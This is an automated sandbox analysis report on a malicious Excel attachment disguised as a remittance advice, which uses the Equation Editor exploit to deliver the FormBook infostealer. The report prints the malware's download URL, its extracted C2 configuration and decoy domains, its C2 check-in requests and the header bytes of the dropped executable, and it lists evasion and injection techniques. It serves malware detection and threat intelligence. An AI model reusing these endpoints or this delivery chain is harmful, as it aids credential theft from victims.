Windows Analysis Report Remittance_Advice_details001009142021.xlsx

Overview

General Information

Sample Name: Remittance_Advice_details001009142021.xlsx
Analysis ID: 483680
MD5: 849137c07d96b63b89b0fe9fc240751e
SHA1: 21f9985416c2bfc51a88615f5806916fa1165502
SHA256: 594eeeb07a9f81d9a2e3718fb25ca290ca86a45990a9ca89799dcbdcf114779c
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
Multi AV Scanner detection for submitted file
Source: Remittance_Advice_details001009142021.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://107.173.219.122/files/loader1.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe ReversingLabs: Detection: 40%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.2c0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, wuapp.exe
Source: Binary string: wuapp.pdb source: vbc.exe, 00000008.00000002.521643579.0000000000839000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.garimpeirastore.online
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop esi 8_2_00415852
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 8_2_00406A98
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 8_2_00415699
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop edi 11_2_000F5699
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop esi 11_2_000F5852
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop ebx 11_2_000E6A99
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.219.122:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.219.122:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 107.173.219.122:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.51 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.matcitekids.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.248.20 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.garimpeirastore.online
Source: C:\Windows\explorer.exe Domain query: www.doityourselfism.com
Source: C:\Windows\explorer.exe Network Connect: 169.62.91.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.onedadtwodudes.com
Source: C:\Windows\explorer.exe Domain query: www.ecofingers.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.extinctionbrews.com/dy8g/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=OTag2QWxPYUT5Vjr08k9uySlAuCzwAh9yU7TJs1orjitWjs6OQC6P28HkD9bWaqSe7I0Ww==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.onedadtwodudes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=Y4JBfBjEKLG3bE/nPu+ARLK4ZQab+dap1kyoobOuuyzzJOKZWwpYr6zx24KPHwTC7q0HDg==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=dI9eO6GBnSulhV6EbBGZI9CJMc/scmM0Fshd6X+e3vq0VlxBF2NWOUbA55lfRDBFVPtqQQ==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:30:01 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Tue, 14 Sep 2021 23:01:05 GMTETag: "49600-5cbfc8e69e3fb"Accept-Ranges: bytesContent-Length: 300544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 69 76 63 ea 2d 17 0d b9 2d 17 0d b9 2d 17 0d b9 20 45 ec b9 35 17 0d b9 20 45 d2 b9 22 17 0d b9 20 45 ed b9 48 17 0d b9 39 7c 0c b8 3e 17 0d b9 2d 17 0c b9 58 17 0d b9 ba 49 09 b8 2c 17 0d b9 bf 49 f2 b9 2c 17 0d b9 ba 49 0f b8 2c 17 0d b9 52 69 63 68 2d 17 0d b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a7 29 41 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b8 00 00 00 f8 03 00 00 00 00 00 33 2a 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 1b 06 05 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 13 01 00 c8 00 00 00 00 60 01 00 a0 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 04 00 74 0d 00 00 30 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 b6 00 00 00 10 00 00 00 b8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 4d 00 00 00 d0 00 00 00 4e 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 31 00 00 00 20 01 00 00 14 00 00 00 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 68 03 00 00 60 01 00 00 6a 03 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 74 0d 00 00 00 d0 04 00 00 0e 00 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.219.122Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.484251660.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 0000000A.00000000.499283905.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.484251660.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: AA6CA394.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Anti_Wrinkle_Creams.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2F
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Best_Mortgage_Rates.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2F
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Best_Penny_Stocks.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUU
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Credit_Card_Application.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jV
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Free_Credit_Report.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FU
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Work_from_Home.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUUZJT
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/display.cfm
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/dy8g/?illD=OTag2QWxPYUT5Vjr08k9uySlAuCzwAh9yU7TJs1orjitWjs6OQC6P28HkD9
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/find_a_tutor.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUUZJTLt
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/px.js?ch=2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/sk-logabpstatus.php?a=VWFRUU1lL1pRcXBSSlh6S0wrZnpqVkRFSTlReFR5VHJjUENN
Source: explorer.exe, 0000000A.00000000.508760960.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.508760960.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
